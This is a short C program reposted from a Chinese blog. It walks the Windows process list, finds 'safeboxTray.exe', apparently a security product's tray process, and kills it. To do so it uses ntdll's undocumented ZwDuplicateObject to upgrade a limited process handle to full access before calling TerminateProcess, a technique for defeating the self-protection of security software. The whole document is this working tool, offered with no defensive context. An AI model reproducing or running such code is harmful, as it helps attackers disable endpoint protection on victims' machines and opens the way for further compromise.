转载自骁骑营的伙夫BLOG
#include <stdio.h>
#include <windows.h>
#include <tlhelp32.h>
typedef DWORD (_stdcall *_ZwDuplicateObject)(
IN HANDLE SourceProcessHandle,
IN PHANDLE SourceHandle,
IN HANDLE TargetProcessHandle,
OUT PHANDLE TargetHandle,
IN ACCESS_MASK DesiredAccess OPTIONAL,
IN BOOLEAN InheritHandle,
IN ULONG Options
);
int kill(DWORD pid);
int main()
{
PROCESSENTRY32 pe32;
int count=0;
HANDLE hProcessSnap;
BOOL bMore;
pe32.dwSize=sizeof(pe32);
hProcessSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
if(hProcessSnap==INVALID_HANDLE_VALUE)
{
printf("CreateToolhelp32Snapshot调用失败!");
return -1;
}
bMore=Process32First(hProcessSnap,&pe32);
printf("%20s\t%10s\n","进程名","PID");
printf("====================================\n");
while(bMore)
{
printf("%s\n",pe32.szExeFile);
if(!strncmp("safeboxTray.exe",pe32.szExeFile, sizeof("SafeboxTray.exe")))
{
printf("Find SafeboxTray, begining to kill it...\n");
kill(pe32.th32ProcessID);
break;
}
bMore=Process32Next(hProcessSnap,&pe32);
}
CloseHandle(hProcessSnap);
printf("====================================\n");
// printf("\n当前系统进程数为:%d\n",count);
return 0;
}
int kill(DWORD pid)
{
HMODULE hNtdll;
HANDLE hl;
_ZwDuplicateObject proc;
hNtdll = GetModuleHandle("ntdll.dll");
proc = (void*)GetProcAddress(hNtdll,"ZwDuplicateObject");
hl = OpenProcess(0x400,0,pid);
if(hl != NULL)
{
proc((HANDLE)-1,(PHANDLE)hl,(HANDLE)-1,&hl,0x1F0FFF,0, 1);
}
TerminateProcess(hl, 0);
printf("Kill Over.\n");
return 1;
}